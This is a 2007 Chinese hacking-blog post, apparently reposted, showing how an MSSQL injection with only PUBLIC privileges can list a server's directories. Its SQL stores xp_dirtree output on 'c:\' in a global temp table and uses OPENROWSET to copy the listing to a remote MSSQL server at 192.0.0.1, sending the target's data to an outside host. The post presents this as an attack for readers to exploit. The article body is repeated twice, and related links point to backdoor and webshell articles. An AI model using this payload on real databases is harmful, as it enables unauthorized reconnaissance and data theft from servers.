MSSQL注入PUBLIC權(quán)限下的xp_dirtree再度利用方法
更新時(shí)間:2007年10月08日 22:50:16 作者:
軟件作者:kj021320
信息來(lái)源:I.S.T.O技術(shù)團(tuán)隊(duì)(http://blog.csdn.net/I_S_T_O/)
本來(lái)這文章在TEAM里面放了好久的了!只是<<art of sql injection>>的一個(gè)小部分,可惜寫(xiě)了好久資料收集了好多但是估計(jì)年底都沒(méi)能出來(lái)~那就先發(fā)出來(lái)了!主要是MSSQL2005都來(lái)了!2K的話(huà)沒(méi)多久就會(huì)給淘汰了~拿出來(lái)跟大家交流吧~廣告說(shuō)完了...
正文:
提起public權(quán)限的用戶(hù)估計(jì)很多人也覺(jué)得郁悶了吧~N久以前看了一篇《論在mssql中public和db_owner權(quán)限下拿到webshell或是系統(tǒng)權(quán)限》的文章(名字真長(zhǎng)-_-!!!),里面說(shuō)到?jīng)]辦法利用xp_regread,xp_dirtree…這些存儲(chǔ)過(guò)程,原因是public沒(méi)有辦法建表,我在這里矯正一下其實(shí)public是可以建表的~呵呵,使這些存儲(chǔ)過(guò)程能利用上,看下面的代碼吧
--建立一個(gè)臨時(shí)表,一般的表我們是無(wú)辦法建立的,我們只能建立臨時(shí)表
create table ##nonamed(
dir ntext,
num int
)
--調(diào)用存儲(chǔ)過(guò)程把執(zhí)行回來(lái)的數(shù)據(jù)存到臨時(shí)表里面
insert ##nonamed execute master..xp_dirtree 'c:\',1
--然后采用openrowset函數(shù)把臨時(shí)表的數(shù)據(jù)導(dǎo)到本地MSSQL 的dirtree表里面了
insert into openrowset('sqloledb', '192.0.0.1';'user';'pass', 'select * from Northwind.dbo.dirtree')
select * from ##nonamed
以上方法,也就是說(shuō)public可以遍歷用戶(hù)服務(wù)器的目錄 具體有什么利用價(jià)值嘛~呵呵見(jiàn)仁見(jiàn)智了
Trackback: http://tb.blog.csdn.net/TrackBack.aspx?PostId=1736964
信息來(lái)源:I.S.T.O技術(shù)團(tuán)隊(duì)(http://blog.csdn.net/I_S_T_O/)
本來(lái)這文章在TEAM里面放了好久的了!只是<<art of sql injection>>的一個(gè)小部分,可惜寫(xiě)了好久資料收集了好多但是估計(jì)年底都沒(méi)能出來(lái)~那就先發(fā)出來(lái)了!主要是MSSQL2005都來(lái)了!2K的話(huà)沒(méi)多久就會(huì)給淘汰了~拿出來(lái)跟大家交流吧~廣告說(shuō)完了...
正文:
提起public權(quán)限的用戶(hù)估計(jì)很多人也覺(jué)得郁悶了吧~N久以前看了一篇《論在mssql中public和db_owner權(quán)限下拿到webshell或是系統(tǒng)權(quán)限》的文章(名字真長(zhǎng)-_-!!!),里面說(shuō)到?jīng)]辦法利用xp_regread,xp_dirtree…這些存儲(chǔ)過(guò)程,原因是public沒(méi)有辦法建表,我在這里矯正一下其實(shí)public是可以建表的~呵呵,使這些存儲(chǔ)過(guò)程能利用上,看下面的代碼吧
--建立一個(gè)臨時(shí)表,一般的表我們是無(wú)辦法建立的,我們只能建立臨時(shí)表
create table ##nonamed(
dir ntext,
num int
)
--調(diào)用存儲(chǔ)過(guò)程把執(zhí)行回來(lái)的數(shù)據(jù)存到臨時(shí)表里面
insert ##nonamed execute master..xp_dirtree 'c:\',1
--然后采用openrowset函數(shù)把臨時(shí)表的數(shù)據(jù)導(dǎo)到本地MSSQL 的dirtree表里面了
insert into openrowset('sqloledb', '192.0.0.1';'user';'pass', 'select * from Northwind.dbo.dirtree')
select * from ##nonamed
以上方法,也就是說(shuō)public可以遍歷用戶(hù)服務(wù)器的目錄 具體有什么利用價(jià)值嘛~呵呵見(jiàn)仁見(jiàn)智了
Trackback: http://tb.blog.csdn.net/TrackBack.aspx?PostId=1736964
相關(guān)文章
內(nèi)網(wǎng)滲透-----如何打開(kāi)突破口
內(nèi)網(wǎng)滲透-----如何打開(kāi)突破口...2007-06-06php+mysql注入頁(yè)面實(shí)現(xiàn)
最近在弄靶場(chǎng),原本是打算找一些漏洞程序來(lái)做實(shí)驗(yàn)環(huán)境,但是去找這些程序感覺(jué)太麻煩了,幾段代碼能實(shí)現(xiàn)的東西還是自己寫(xiě)吧2012-07-07變態(tài)入侵之有史以來(lái)最酷的Windows后門(mén)sethc.exe
變態(tài)入侵之有史以來(lái)最酷的Windows后門(mén)sethc.exe...2007-11-11

非常不錯(cuò)的腳本入侵基礎(chǔ)知識(shí)總結(jié)
簡(jiǎn)單的說(shuō)來(lái),webshell就是一個(gè)asp或php木馬后門(mén),黑客在入侵了一個(gè)網(wǎng)站后,常常在將這些 asp或php木馬后門(mén)文件放置在網(wǎng)站服務(wù)器的web目錄中,與正常的網(wǎng)頁(yè)文件混在一起。
2008-06-06